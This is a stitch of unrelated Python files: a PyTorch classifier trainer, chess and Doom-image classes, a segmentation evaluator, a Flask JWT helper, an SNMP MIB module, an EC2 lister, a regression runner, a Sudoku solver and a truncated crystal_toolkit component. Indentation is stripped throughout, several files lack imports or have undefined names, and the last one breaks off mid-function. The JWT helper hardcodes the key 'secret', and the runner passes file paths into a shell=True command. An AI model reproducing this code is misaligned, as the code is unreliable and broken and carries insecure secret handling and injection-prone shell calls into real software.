from sklearn.metrics import roc_auc_score
import torch
import torch.nn as nn
from torch.autograd import Variable
import torch.nn.functional as F
import network as models
import math
import argparse
import pylib
# Set random seed
seed = 0
random.seed(seed)
np.random.seed(seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
torch.manual_seed(seed)
# CUDA
device_id = 0 # ID of GPU to use
cuda = torch.cuda.is_available()
if cuda:
torch.cuda.set_device(device_id)
torch.cuda.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
plt.ioff()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--data_folder', type=str, default='data/')
parser.add_argument('-l', '--dataset_file_list', nargs='+', help='<Required> Set flag', required=True, type=str)
parser.add_argument('--train_num', type=int, default=2)
parser.add_argument('--code_save', type=str, default='code_list.pkl')
parser.add_argument('--take_log', type=bool, default=False)
parser.add_argument('--standardization', type=bool, default=False)
parser.add_argument('--scaling', type=bool, default=False)
parser.add_argument('--plots_dir', type=str, default='plots/')
parser.add_argument('--code_dim', type=int, default=25)
parser.add_argument('--batch_size', type=int, default=128, help='mini-batch size')
parser.add_argument('--num_epochs', type=int, default=100, help='number of total iterations for training')
parser.add_argument('--lr_step', type=int, default=10000, help='step decay of learning rates')
parser.add_argument('--base_lr', type=float, default=1e-4, help='learning rate for network')
parser.add_argument('--l2_decay', type=float, default=5e-5)
parser.add_argument('--log_interval', type=int, default=100)
config = parser.parse_args()
#print(config)
data_folder = config.data_folder
code_save_file = data_folder + config.code_save
dataset_file_list = [data_folder+f for f in config.dataset_file_list]
data_num = len(dataset_file_list)
train_num = config.train_num
plots_dir = config.plots_dir
# read data
pre_process_paras = {'take_log': config.take_log, 'standardization': config.standardization, 'scaling': config.scaling}
dataset_list = pre_processing(dataset_file_list, pre_process_paras)
# training
batch_size = config.batch_size
num_epochs = config.num_epochs
num_inputs = len(dataset_list[0]['feature'])
code_dim = config.code_dim
# construct a DataLoader for each batch
batch_loader_dict = {}
for i in range(len(dataset_list)):
gene_exp = dataset_list[i]['mz_exp'].transpose()
labels = dataset_list[i]['labels']
# construct DataLoader list
if cuda:
torch_dataset = torch.utils.data.TensorDataset(
torch.FloatTensor(gene_exp).cuda(), torch.LongTensor(labels).cuda())
else:
torch_dataset = torch.utils.data.TensorDataset(
torch.FloatTensor(gene_exp), torch.LongTensor(labels))
data_loader = torch.utils.data.DataLoader(torch_dataset, batch_size=batch_size,
shuffle=True, drop_last=True)
batch_loader_dict[i+1] = data_loader
# create model
discriminator = models.Discriminator(num_inputs=num_inputs)
if cuda:
discriminator.cuda()
log_interval = config.log_interval
base_lr = config.base_lr
lr_step = config.lr_step
num_epochs = config.num_epochs
l2_decay = config.l2_decay
# training
criterion = nn.CrossEntropyLoss()
loss_classifier_list = []
for epoch in range(1, num_epochs + 1):
# step decay of learning rate
#learning_rate = base_lr / math.pow(2, math.floor(epoch / lr_step))
learning_rate = base_lr * math.pow(0.9, epoch / lr_step)
# regularization parameter between two losses
gamma_rate = 2 / (1 + math.exp(-10 * (epoch) / num_epochs)) - 1
if epoch % log_interval == 0:
print('{:}, Epoch {}, learning rate {:.3E}'.format(time.asctime(time.localtime()), epoch, learning_rate))
optimizer = torch.optim.Adam([
{'params': discriminator.parameters()},
], lr=learning_rate, weight_decay=l2_decay)
discriminator.train()
iter_data_dict = {}
for cls in batch_loader_dict:
iter_data = iter(batch_loader_dict[cls])
iter_data_dict[cls] = iter_data
# use the largest dataset to define an epoch
num_iter = 0
for cls in batch_loader_dict:
num_iter = max(num_iter, len(batch_loader_dict[cls]))
total_clas_loss = 0
num_batches = 0
for it in range(0, num_iter):
data_dict = {}
label_dict = {}
code_dict = {}
reconstruct_dict = {}
Disc_dict = {}
for cls in iter_data_dict:
data, labels = iter_data_dict[cls].next()
data_dict[cls] = data
label_dict[cls] = labels
if it % len(batch_loader_dict[cls]) == 0:
iter_data_dict[cls] = iter(batch_loader_dict[cls])
data_dict[cls] = Variable(data_dict[cls])
label_dict[cls] = Variable(label_dict[cls])
for cls in range(1,train_num+1):
Disc_dict[cls] = discriminator(data_dict[cls])
optimizer.zero_grad()
#Loss
# classifier loss for dignosis
loss_classification = torch.FloatTensor([0])
if cuda:
loss_classification = loss_classification.cuda()
for cat in range(1,train_num+1):
for cls in range(len(label_dict[cat])):
loss_classification += F.binary_cross_entropy(torch.squeeze(Disc_dict[cat])[cls], label_dict[cat][cls].float())
#loss_classification = criterion(Disc_dict[cat], label_dict[cat])
loss = loss_classification
loss.backward()
optimizer.step()
# update total loss
num_batches += 1
total_clas_loss += loss_classification.data.item()
avg_clas_loss = total_clas_loss / num_batches
if epoch % log_interval == 0:
print('Avg_classify_loss {:.3E}'.format(avg_clas_loss))
loss_classifier_list.append(avg_clas_loss)
#scheduler.step()
plot_clas_loss(loss_classifier_list, plots_dir+'clas_loss.png')
# testing: extract codes
discriminator.eval()
#F_score
def matric(cluster, labels):
TP, TN, FP, FN = 0, 0, 0, 0
n = len(labels)
for i in range(n):
if cluster[i]:
if labels[i]:
TP += 1
else:
FP += 1
elif labels[i]:
FN += 1
else:
TN += 1
return TP, TN, FP, FN
#Accuracy
for pre in range(train_num,len(dataset_list)):
test_data = torch.from_numpy(dataset_list[pre]['mz_exp'].transpose())
test_label = torch.from_numpy((np.array(dataset_list[pre]['labels']))).cuda()
Disc = discriminator(test_data.float().cuda())
pred = torch.from_numpy(np.array([1 if i > 0.5 else 0 for i in Disc])).cuda()
#pred = torch.max(F.softmax(Disc), 1)[1]
num_correct = 0
num_correct += torch.eq(pred, test_label).sum().float().item()
Acc = num_correct/len(test_label)
print("Accuracy is ", Acc)
TP, TN, FP, FN = matric(pred, test_label)
precision = TP / (TP + FP)
recall = TP / (TP + FN)
f_score = 2 * precision * recall / (precision + recall)
print("F_score is ",f_score)
#AUC
print("AUC is ",roc_auc_score(test_label.cpu(), pred.cpu()))
#MCC
MCC = (TP * TN - FP * FN) / math.sqrt((TP + FP) * (TP + FN) * (TN + FP) * (TN + FN))
print("MCC is ",MCC)
| 8,286 | 2,766 |
from piece import Piece
from .rook import Rook
from .bishop import Bishop
class Queen(Piece):
def __init__(self, white):
super().__init__(white)
self.rook = Rook(white)
self.bishop = Bishop(white)
def can_move(self, board, start, end) -> bool:
"""
Determines if queen can currently move to marked position
"""
if (self.rook.can_move(board, start, end)
or self.bishop.can_move(board, start, end)):
return True
return False
def controlled_squares(self, board, x, y) -> list:
rook_squares = self.rook.controlled_squares(board, x, y)
bishop_squares = self.bishop.controlled_squares(board, x, y)
return rook_squares + bishop_squares
def legal_moves(self, board, x, y) -> list:
rook_moves = self.rook.legal_moves(board, x, y)
bishop_moves = self.bishop.legal_moves(board, x, y)
return rook_moves + bishop_moves
| 966 | 314 |
from struct import Struct
from typing import Optional
from PIL import Image
from doom.palette import Palette
class DoomImage(object):
S_HEADER: Struct = Struct('<HHhh')
def __init__(self, width: int, height: int, left: int, top: int):
self.width: int = width
self.height: int = height
self.left: int = left
self.top: int = top
self.pixels: Optional[bytes] = None
@classmethod
def from_data(cls, data: bytes, palette: Palette):
"""
Creates a DoomImage with doom graphics data rendered to an internal buffer.
:param data:
:param palette:
:return:
"""
width, height, left, top = DoomImage.S_HEADER.unpack_from(data)
data_len = len(data)
# Attempt to detect invalid data.
if width > 2048 or height > 2048 or top > 2048 or left > 2048:
return None
if width <= 0 or height <= 0:
return None
image = cls(width, height, left, top)
# Initialize an empty bitmap.
pixels = bytearray([0, 0, 0] * width * height)
pixels_len = len(pixels)
# Read column offsets.
offset_struct = Struct('<' + ('I' * width))
offsets = offset_struct.unpack_from(data[8:8 + (width * 4)])
# Read columns.
column_index = 0
while column_index < width:
offset = offsets[column_index]
# Attempt to detect invalid data.
if offset >= data_len:
return None
prev_delta = 0
while True:
column_top = data[offset]
# Column end.
if column_top == 255:
break
# Tall columns are extended.
if column_top <= prev_delta:
column_top += prev_delta
prev_delta = column_top
pixel_count = data[offset + 1]
offset += 3
pixel_index = 0
while pixel_index < pixel_count:
if offset + pixel_index >= data_len:
break
pixel = data[offset + pixel_index]
destination = ((pixel_index + column_top) * width + column_index) * 3
if destination + 2 < pixels_len:
pixels[destination + 0] = palette.colors[pixel].r
pixels[destination + 1] = palette.colors[pixel].g
pixels[destination + 2] = palette.colors[pixel].b
pixel_index += 1
offset += pixel_count + 1
if offset >= data_len:
break
column_index += 1
image.pixels = bytes(pixels)
return image
@staticmethod
def is_valid(data: bytes) -> bool:
"""
Determine if some data is likely to be a valid Doom type image.
:param data:
:return:
"""
if len(data) < 16:
return False
# Verify if the header values are sane.
width, height, left, top = DoomImage.S_HEADER.unpack_from(data)
if width > 2048 or height > 2048 or top > 2048 or left > 2048:
return False
if width <= 0 or height <= 0:
return False
# Verify that offsets are in range of the data.
offset_struct = Struct('<' + ('I' * width))
offsets = offset_struct.unpack_from(data[8:8 + (width * 4)])
for offset in offsets:
if offset >= len(data):
return False
return True
def get_pillow_image(self) -> Image:
"""
Returns a Pillow image from this graphic's image data.
:return:
"""
return Image.frombytes('RGB', (self.width, self.height), self.pixels)
| 3,842 | 1,116 |
import argparse
import boundary_utils as bu
import numpy as np
import os
import sys
import time
from utils import *
from multiprocessing import Pool
import pickle as pk
from PIL import Image
def parse_args():
parser = argparse.ArgumentParser(
description='Evaluate drivable area and semantic segmentation predictions')
parser.add_argument('-d', '--data-dir', default=None)
parser.add_argument('-p', '--pred-dir', default=None)
args = parser.parse_args()
return args
def _eval_drivable(infos):
global task
gt_fn, pred_fn = infos
gt = np.array(Image.open(gt_fn))
pred = np.load(pred_fn)
drivable_hist = fast_hist(pred.flatten(), gt.flatten(), 3)
return [drivable_hist]
def _eval_sem_seg(infos):
global task
gt_fn, pred_fn = infos
gt = np.array(Image.open(gt_fn))
pred = np.load(pred_fn).squeeze(0).astype(np.uint8)
# semantic segmentation
hist = fast_hist(pred.flatten(), gt.flatten(), 19)
return hist
def main():
args = parse_args()
tasks = os.listdir(args.pred_dir)
# segmentation
if 'sem_seg' in tasks:
print('Evaluating semantic segmentation...')
sem_seg_base = os.path.join(args.data_dir, 'images', '10k', 'val')
gt_fns = [os.path.join(args.data_dir, 'labels', 'sem_seg', 'sem_seg_val', fn[:-4] + '_train_id.png') for fn in os.listdir(sem_seg_base)]
sem_seg_fns = [os.path.join(args.pred_dir, 'sem_seg', '{}.npy'.format(fn[:-4])) for fn in os.listdir(sem_seg_base)]
pool = Pool(5)
o = pool.imap_unordered(_eval_sem_seg, zip(gt_fns, sem_seg_fns))
tic = time.time()
while len(o._items) < len(gt_fns):
toc = time.time()
finished = len(o._items)
if finished > 0:
print('{}/{} ETA: {}s Elapsed: {}s'.format(finished, len(gt_fns), (len(gt_fns) - finished) / finished * (toc - tic), toc - tic), end='\r')
time.sleep(10)
pool.close()
pool.join()
evals = [i[1] for i in o._items]
hist = np.sum(evals, axis=0)
ious = per_class_iu(hist).tolist()
classes = ['road', 'sidewalk', 'building', 'wall', 'fence', 'pole', 'traffic light', 'traffic sign', 'vegetation', 'terrain', 'sky', 'person', 'rider', 'car', 'truck', 'bus', 'train', 'motorcycle', 'bicycle', 'TOTAL']
ious.append(np.nanmean(ious))
print('[SEMANTIC]')
[print(a, '\t\t', b) for a, b in zip(classes, ious)]
print(','.join([str(i) for i in ious]))
# drivable area
if 'drivable' in tasks:
print('Evaluating drivable...')
drivable_base = os.path.join(args.data_dir, 'labels', 'drivable', 'drivable_val')
gt_fns = sorted([os.path.join(drivable_base, d) for d in os.listdir(drivable_base)])
pred_drivable_base = os.path.join(args.pred_dir, 'drivable')
drivable_fns = [os.path.join(pred_drivable_base, '{}.npy'.format(n.split('.')[0].split('/')[-1])) for n in gt_fns]
pool = Pool(10)
print(len(gt_fns), len(drivable_fns))
o = pool.imap_unordered(_eval_drivable, zip(gt_fns, drivable_fns))
tic = time.time()
while len(o._items) < len(gt_fns):
toc = time.time()
finished = len(o._items)
if finished > 0:
print('{}/{} ETA: {}s Elapsed: {}s'.format(finished, len(gt_fns), (len(gt_fns) - finished) / finished * (toc - tic), toc - tic), end='\r')
time.sleep(10)
pool.close()
pool.join()
drivable_evals = [i[1] for i in o._items]
# if len(drivable_evals[0][0]) == 9:
# lane_evals = np.mean([i[0] for i in drivable_evals], axis=0)
# print('[LANE]\n[thresh=10] {} {} {}\n[thresh=5] {} {} {}\n[thresh=1] {} {} {}'.format(*lane_evals))
# for e in lane_evals:
# print(e)
drivable_hist = np.sum(drivable_evals, axis=0)
drivable_ious = per_class_iu(drivable_hist[0]).tolist()
drivable_ious.append(sum(drivable_ious[1:])/2)
print('[DRIVABLE]\n[direct] {} [alt] {} [overall] {}'.format(*drivable_ious[1:]))
for d in drivable_ious:
print(d)
if __name__ == '__main__':
main()
| 4,327 | 1,675 |
import jwt
from flask import request, jsonify
from datetime import datetime
from dateutil.relativedelta import relativedelta
from functools import wraps
from jungle_book.user.models import User
algorithm = "HS256"
key = "secret" # TODO put this into env variables
NOW = datetime.now()
SIX_MONTHS_LATER = NOW + relativedelta(months=+6)
def encode_jwt(payload):
"""Encode JWT token with HS256 hashing algorithm"""
payload.update({
"exp": SIX_MONTHS_LATER,
"iat": NOW
})
token = jwt.encode(
payload=payload,
key=key,
algorithm=algorithm
).decode('utf-8')
return token
def decode_jwt(token):
"""Decode JWT token"""
decoded_token = jwt.decode(jwt=token, key=key)
return decoded_token
def validate_jwt(token):
"""Validate given JWT"""
try:
jwt.decode(jwt=token, key=key)
except jwt.ExpiredSignatureError:
return False
return True
def extend_jwt(token):
"""Returns new JWT if given token is valid"""
if validate_jwt(token):
payload = decode_jwt(token)
new_token = encode_jwt(payload)
return new_token
else:
return "Provided token is invalid."
def token_required(f):
@wraps(f)
def decorated(*args, **kwargs):
token = None
if 'x-access-token' in request.headers:
token = request.headers['x-access-token']
if not token:
return jsonify({'message': 'Token is missing'}), 401
try:
data = decode_jwt(token)
user = User.query.filter_by(id=data['id']).first()
except jwt.exceptions.DecodeError:
return jsonify({'message': 'Token is invalid!'}), 401
return f(user, *args, **kwargs)
return decorated
| 1,795 | 588 |
#
# PySNMP MIB module REMOTE-LOGIN-TRAP-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/REMOTE-LOGIN-TRAP-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 20:47:32 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsIntersection, ValueRangeConstraint, ConstraintsUnion, SingleValueConstraint, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsIntersection", "ValueRangeConstraint", "ConstraintsUnion", "SingleValueConstraint", "ValueSizeConstraint")
s5AgRemoteLoginIp, s5AgRemoteLoginStatus = mibBuilder.importSymbols("S5-AGENT-MIB", "s5AgRemoteLoginIp", "s5AgRemoteLoginStatus")
remoteLoginTrap, = mibBuilder.importSymbols("S5-ROOT-MIB", "remoteLoginTrap")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
Counter64, Integer32, NotificationType, Unsigned32, MibScalar, MibTable, MibTableRow, MibTableColumn, iso, Gauge32, IpAddress, MibIdentifier, NotificationType, ModuleIdentity, ObjectIdentity, Bits, TimeTicks, Counter32 = mibBuilder.importSymbols("SNMPv2-SMI", "Counter64", "Integer32", "NotificationType", "Unsigned32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "iso", "Gauge32", "IpAddress", "MibIdentifier", "NotificationType", "ModuleIdentity", "ObjectIdentity", "Bits", "TimeTicks", "Counter32")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
remoteLoginStatus = NotificationType((1, 3, 6, 1, 4, 1, 45, 1, 6, 2, 8) + (0,1)).setObjects(("S5-AGENT-MIB", "s5AgRemoteLoginIp"), ("S5-AGENT-MIB", "s5AgRemoteLoginStatus"))
mibBuilder.exportSymbols("REMOTE-LOGIN-TRAP-MIB", remoteLoginStatus=remoteLoginStatus)
| 2,035 | 756 |
import boto.ec2
import config
region = config.get("aws_region")
conn = boto.ec2.connect_to_region(region)
reservations = conn.get_all_instances()
fields = ("id", "public ip", "private ip", "name", "subnet", "state")
format_str = "{:<20} {:<16} {:<16} {:<16} {:<16} {:<12}"
print(format_str.format(*fields))
sep = ('-'*12,) * 6
print(format_str.format(*sep))
for res in reservations:
for inst in res.instances:
name = '<none>'
if 'Name' in inst.tags:
name = inst.tags["Name"]
if inst.ip_address is None:
inst.ip_address = '<none>'
if inst.private_ip_address is None:
inst.private_ip_address = '<none>'
if inst.subnet_id is None:
inst.subnet_id = "<none>"
print(format_str.format(inst.id, inst.ip_address, inst.private_ip_address, name, inst.subnet_id, inst.state))
| 877 | 313 |
'''
Created on Feb 8, 2017
This is the regression script the langlib project.
It is meant to be run at the top level directory of the repository.
'''
import copy,json
from os import walk
from os.path import exists,splitext
from subprocess import Popen, PIPE
from string import digits
import difflib
import sys
#This is the location of the testfiles and manifest relative to the root directory.
testfiles = "./testfiles/"
manifest_file = "./MANIFEST"
#This dict defines the translation from directory names in the "testfiles" directory to actual rosie pattern
#i.e. csharp -> "cs.<pattern>"
langs = {
"java" : "java",
"c" : "c",
"cpp" : "cpp",
"csharp" : "cs",
"go" : "go",
"javascript" : "js",
"ruby" : "rb",
"r" : "r",
"bash" : "b",
"vb" : "vb",
"python" : "py",
}
#This array defines the actuals expected to be ran by the script. These are also the expected directory names
#for associated tests under the testfiles/language i.e. each "comments" -> "./testfiles/<language>/comments/
tests = [
"comments",
"dependencies",
"functions",
"classes",
"structs",
"strings"
]
class HtmlPrinter:
'''
This is a simple html printer used to write the various results table generated
by run_tests to an html file.
'''
def __init__(self,id):
'''
Initializes the printer
id : Numeric id of the test execution (test id).
'''
self.ts = id
self.file=open("./result" + str(self.ts) + ".html", 'w')
def add_table(self,test,html):
self.file.write("<h1>" + test + "</h1>")
self.file.write(html)
def close(self):
self.file.close()
def run_tests():
'''
This function iterates through all directories found under ./testfiles/ and executes tests if possible.
The process is as follows:
1. Find directory in ./testfiles/, and verify if it maps to a value in the langs.
Continue to step 2 if it does not or move to new directory.
2. Find a directory in the langs directory found in step 1, and verify if it maps to a test in the tests array.
Continue to step 3 if it does not or move to a new directory.
3. Find a file in the test directory found in step 2.
If the file is correctly named i.e <pattern name><numeric id>.<valid_extension> then strip the numeric id,
and and the pattern name.
4. Verify that the input file has a corresponding json output file in ./testfiles/<lang>/output/<test>/.
If it does continue to step 5 otherwise move to a new test file.
5. Execute the input file and compare the results to the output file. Fail the test if a difference is found,
and print the diff using HTMLPrinter.
6. Move to new test file as appropriate and continue.
'''
failures = 0
testCount = 0
printer = HtmlPrinter(sys.argv[1])
for test in tests:
for lang,alias in langs.items():
base_path = testfiles + lang + "/input/" + test + "/"
for (dirpath, dirnames, test_files) in walk(base_path):
for test_file in test_files:
resolved_input = dirpath + test_file
resolved_output = splitext(resolved_input)[0].replace("input","output") + ".json"
if not exists(resolved_input): continue
if not exists(resolved_output): continue
with open(resolved_output, 'rU') as vOut:
test_file_name = splitext(test_file)[0]
pattern = copy.copy(test_file_name)
pattern = pattern.translate(None,digits)
proc = Popen('rosie -manifest ' + manifest_file + ' -wholefile -encode json ' + alias + "." + pattern + " " + resolved_input, stdout=PIPE, stderr=PIPE,shell=True)
stdout = ''
stderr = ''
for line in proc.stdout: stdout += line
for line in proc.stderr: stderr += line
if(stderr != ''): print(stderr)
try:
json1 = json.loads(vOut.read())
json2 = json.loads(stdout)
jsonOut1 = json.dumps(json1,indent=2, sort_keys=True)
jsonOut2 = json.dumps(json2,indent=2, sort_keys=True)
if jsonOut1 != jsonOut2:
differ = difflib.HtmlDiff()
printer.add_table(lang + " : " + test_file_name, ''.join(differ.make_file(jsonOut1.splitlines(True),jsonOut2.splitlines(True))))
failures += 1
print("-------------------------------------------------")
print (test_file_name + " test failed for " + lang)
except ValueError:
failures += 1
print("-------------------------------------------------")
print (test_file_name + " test failed for " + lang)
testCount += 1
print("-------------------------------------------------")
if(testCount == 1):
print(str(testCount) + " test ran")
else:
print(str(testCount) + " tests ran")
if(failures == 1):
print(str(failures) + " test failed")
else:
print(str(failures) + " tests failed")
print("-------------------------------------------------")
printer.close()
if(failures > 0): exit(1)
if __name__ == '__main__':
run_tests()
| 5,795 | 1,572 |
# Class https://docs.python.org/3/tutorial/classes.html
class SudokuSolver:
def __init__(self, boxes, unitlist):
self.boxes = boxes
self.unitlist = unitlist
# My solution
def set_boxes_values(values):
board = {}
for index in range(len(self.boxes)):
board[self.boxes[index]] = values[index]
return board
#Better solution
def grid_values(self, values):
assert len(values) == 81, "Input grid must be a string of length 81 (9x9)"
return dict(zip(self.boxes, values))
# The elimination technique https://youtu.be/6rFOX2jHB2g
#Adding Grid values with elimination technique so we can add possible values to grid
def grid_all_posibilities(self, values):
assert len(values) == 81, "Input grid must be a string of length 81 (9x9)"
board = {}
for index in range(len(self.boxes)):
value = values[index]
if value == ".":
board[self.boxes[index]] = "123456789"
else:
board[self.boxes[index]] = value
return board
# Udacity solution
def another_grid_all_posibilities(values):
values = []
all_digits = '123456789'
for c in grid:
if c == '.':
values.append(all_digits)
elif c in all_digits:
values.append(c)
assert len(values) == 81
return dict(zip(self.boxes, values))
# Find board places with one digit element and discard from peers other options
def __eliminate(self, values):
units = dict((s, [u for u in self.unitlist if s in u]) for s in self.boxes)
peers = dict((s, set(sum(units[s],[]))-set([s])) for s in self.boxes)
solved_values = [box for box in values.keys() if len(values[box]) == 1]
for box in solved_values:
digit = values[box]
for peer in peers[box]:
values[peer] = values[peer].replace(digit, '')
return values
# Only choise technique: https://youtu.be/sSjYn-Kex1A
def __only_choise(self, values):
for unit in self.unitlist:
for digit in '123456789':
dplaces = [box for box in unit if digit in values[box]]
if len(dplaces) == 1:
values[dplaces[0]] = digit
return values
# Constraints propagation on solving puzzle
def reduce_puzzle(self, values):
stalled = False
while not stalled:
# Check how many boxes have a determined value
solve_values_before = len([box for box in values.keys() if len(values[box]) == 1])
#Use eliminate strategy
self.__eliminate(values)
#Use Only choise strategy
self.__only_choise(values)
#Check how many boxes have a determined value to compare
solve_values_after = len([box for box in values.keys() if len(values[box]) == 1 ])
#If no new values were added, stop the loop.
stalled = solve_values_before == solve_values_after
#Sanity check: return false if there is a box with zero available values:
if len([box for box in values.keys() if len(values[box]) == 0]):
return False
return values
# search strategy https://youtu.be/omveZu2gRLs
def search(self, values):
# "Using depth-first search and propagation, create a search tree and solve the sudoku."
# First, reduce the puzzle using the previous function
values = self.reduce_puzzle(values)
if values is False:
return False #Error propagation
if all(len(values[s]) == 1 for s in self.boxes):
return values # Solved
# Choose one of the unfilled squares with the fewest possibilities
n, s = min((len(values[s]), s) for s in self.boxes if len(values[s]) > 1)
# Now use recursion to solve each one of the resulting sudokus, and if one returns a value (not False), return that answer!
for value in values[s]:
new_sudoku = values.copy()
new_sudoku[s] = value
attempt = self.search(new_sudoku)
if attempt:
return attempt
def display(self, values, rows, columns):
"""
Display the values as a 2-D grid.
Input: The sudoku in dictionary form
Output: None
"""
width = 1+max(len(values[s]) for s in self.boxes)
line = '+'.join(['-'*(width*3)]*3)
for r in rows:
print(''.join(values[r+c].center(width)+('|' if c in '36' else '')
for c in columns))
if r in 'CF': print(line)
return
| 4,727 | 1,399 |
import dash
from dash import dcc
from dash.dependencies import Input, Output, State
from dash.exceptions import PreventUpdate
from pymatgen.symmetry.analyzer import SpacegroupAnalyzer
from pymatgen.transformations.advanced_transformations import (
GrainBoundaryGenerator,
GrainBoundaryTransformation,
)
from crystal_toolkit.components.transformations.core import TransformationComponent
from crystal_toolkit.helpers.layouts import add_label_help
class GrainBoundaryTransformationComponent(TransformationComponent):
@property
def title(self):
return "Make a grain boundary"
@property
def description(self):
return """Create a grain boundary within a periodic supercell. This transformation
requires sensible inputs, and will be slow to run in certain cases.
When using this transformation a new site property is added which can be used
to colour-code the top and bottom grains."""
@property
def transformation(self):
return GrainBoundaryTransformation
def options_layouts(self, state=None, structure=None):
state = state or {
"rotation_axis": [0, 0, 1],
"rotation_angle": None,
"expand_times": 2,
"vacuum_thickness": 0,
"ab_shift": [0, 0],
"normal": False,
"ratio": None,
"plane": None,
"max_search": 20,
"tol_coi": 1e-8,
"rm_ratio": 0.7,
"quick_gen": False,
}
rotation_axis = self.get_numerical_input(
label="Rotation axis",
kwarg_label="rotation_axis",
state=state,
help_str="""Maximum number of atoms allowed in the supercell.""",
shape=(3,),
)
# sigma isn't a direct input into the transformation, but has
# to be calculated from the rotation_axis and structure
_, sigma_options, _ = self._get_sigmas_options_and_ratio(
structure, state.get("rotation_axis")
)
sigma = dcc.Dropdown(
id=self.id("sigma"),
style={"width": "5rem"},
options=sigma_options,
value=sigma_options[0]["value"] if sigma_options else None,
)
sigma = add_label_help(
sigma,
"Sigma",
"The unit cell volume of the coincidence site lattice relative to "
"input unit cell is denoted by sigma.",
)
# likewise, rotation_angle is then a function of sigma, so
# best determined using sigma to provide a default value:
# this is initialized via a callback
rotation_angle = self.get_choice_input(
label="Rotation angle",
kwarg_label="rotation_angle",
state=state, # starts as None
help_str="""Rotation angle to generate grain boundary. Options determined by
your choice of Σ.""",
style={"width": "15rem"},
)
expand_times = self.get_numerical_input(
label="Expand times",
kwarg_label="expand_times",
state=state,
help_str="""The multiple number of times to expand one unit grain into a larger grain. This is
useful to avoid self-interaction issues when using the grain boundary as an input to further simulations.""",
is_int=True,
shape=(),
min=1,
max=6,
)
vacuum_thickness = self.get_numerical_input(
label="Vacuum thickness /Å",
kwarg_label="vacuum_thickness",
state=state,
help_str="""The thickness of vacuum that you want to insert between the two grains.""",
shape=(),
)
ab_shift = self.get_numerical_input(
label="In-plane shift",
kwarg_label="ab_shift",
state=state,
help_str="""In-plane shift of the two grains given in units of the **a**
and **b** vectors of the grain boundary.""",
shape=(2,),
)
normal = self.get_bool_input(
label="Set normal direction",
kwarg_label="normal",
state=state,
help_str="Enable to require the **c** axis of the top grain to be perpendicular to the surface.",
)
plane = self.get_numerical_input(
label="Grain boundary plane",
kwarg_label="plane",
state=state,
help_str="""Grain boundary plane in the form of a list of integers.
If not set, grain boundary will be a twist grain boundary.
The plane will be perpendicular to the rotation axis.""",
shape=(3,),
)
tol_coi = self.get_numerical_input(
label="Coincidence Site Tolerance",
kwarg_label="tol_coi",
state=state,
help_str="""Tolerance to find the coincidence sites. To check the number of coincidence
sites are correct or not, you can compare the generated grain boundary's sigma with
expected number.""",
shape=(),
)
rm_ratio = self.get_numerical_input(
label="Site Merging Tolerance",
kwarg_label="rm_ratio",
state=state,
help_str="""The criteria to remove the atoms which are too close with each other relative to
the bond length in the bulk system.""",
shape=(),
)
return [
rotation_axis,
sigma,
rotation_angle,
expand_times,
vacuum_thickness,
ab_shift,
normal,
plane,
tol_coi,
rm_ratio,
]
@staticmethod
def _get_sigmas_options_and_ratio(structure, rotation_axis):
rotation_axis = [int(i) for i in rotation_axis]
lat_type = (
"c" # assume cubic if no structure specified, just to set initial choices
)
ratio = None
if structure:
sga = SpacegroupAnalyzer(structure)
lat_type = sga.get_lattice_type()[0] # this should be fixed in pymatgen
try:
ratio = GrainBoundaryGenerator(structure).get_ratio()
except Exception:
ratio = None
cutoff = 10
if lat_type.lower() == "c":
sigmas = GrainBoundaryGenerator.enum_sigma_cubic(
cutoff=cutoff, r_axis=rotation_axis
)
elif lat_type.lower() == "t":
sigmas = GrainBoundaryGenerator.enum_sigma_tet(
cutoff=cutoff, r_axis=rotation_axis, c2_a2_ratio=ratio
)
elif lat_type.lower() == "o":
sigmas = GrainBoundaryGenerator.enum_sigma_ort(
cutoff=cutoff, r_axis=rotation_axis, c2_b2_a2_ratio=ratio
)
elif lat_type.lower() == "h":
sigmas = GrainBoundaryGenerator.enum_sigma_hex(
cutoff=cutoff, r_axis=rotation_axis, c2_a2_ratio=ratio
)
elif lat_type.lower() == "r":
sigmas = GrainBoundaryGenerator.enum_sigma_rho(
cutoff=cutoff, r_axis=rotation_axis, ratio_alpha=ratio
)
else:
return [], None, ratio
options = []
subscript_unicode_map = {
0: "₀",
1: "₁",
2: "₂",
3: "₃",
4: "₄",
5: "₅",
6: "₆",
7: "₇",
8: "₈",
9: "₉",
}
for sigma in sorted(sigmas.keys()):
sigma_label = "Σ{}".format(sigma)
for k, v in subscript_unicode_map.items():
sigma_label = sigma_label.replace(str(k), v)
options.append({"label": sigma_label, "value": sigma})
return sigmas, options, ratio
def generate_callbacks(self, app, cache):
super().generate_callbacks(app, cache)
@app.callback(
Output(self.id("sigma"), "options"),
[Input(self.get_kwarg_id("rotation_axis"), "value")],
[State(self.id("input_structure"), "data")],
)
def update_sigma_options(rotation_axis, structure):
rotation_axis = self.reconstruct_kwarg_from_state(
dash.callback_context.inputs, "rotation_axis"
)
if (rotation_axis is None) or (not structure):
raise PreventUpdate
structure = self.from_data(structure)
_, sigma_options, _ = self._get_sigmas_options_and_ratio(
structure=structure, rotation_axis=rotation_axis
)
# TODO: add some sort of error handling here when sigmas is empty
return sigma_options
@app.callback(
Output(self.id("rotation_angle", is_kwarg=True, hint="literal"), "options"),
[
Input(self.id("sigma"), "value"),
Input(self.get_kwarg_id("rotation_axis"), "value"),
],
[State(self.id("input_structure"), "data")],
)
def update_rotation_angle_options(sigma, rotation_axis, structure):
if not sigma:
raise PreventUpdate
rotation_axis = self.reconstruct_kwarg_from_state(
dash.callback_context.inputs, "rotation_axis"
)
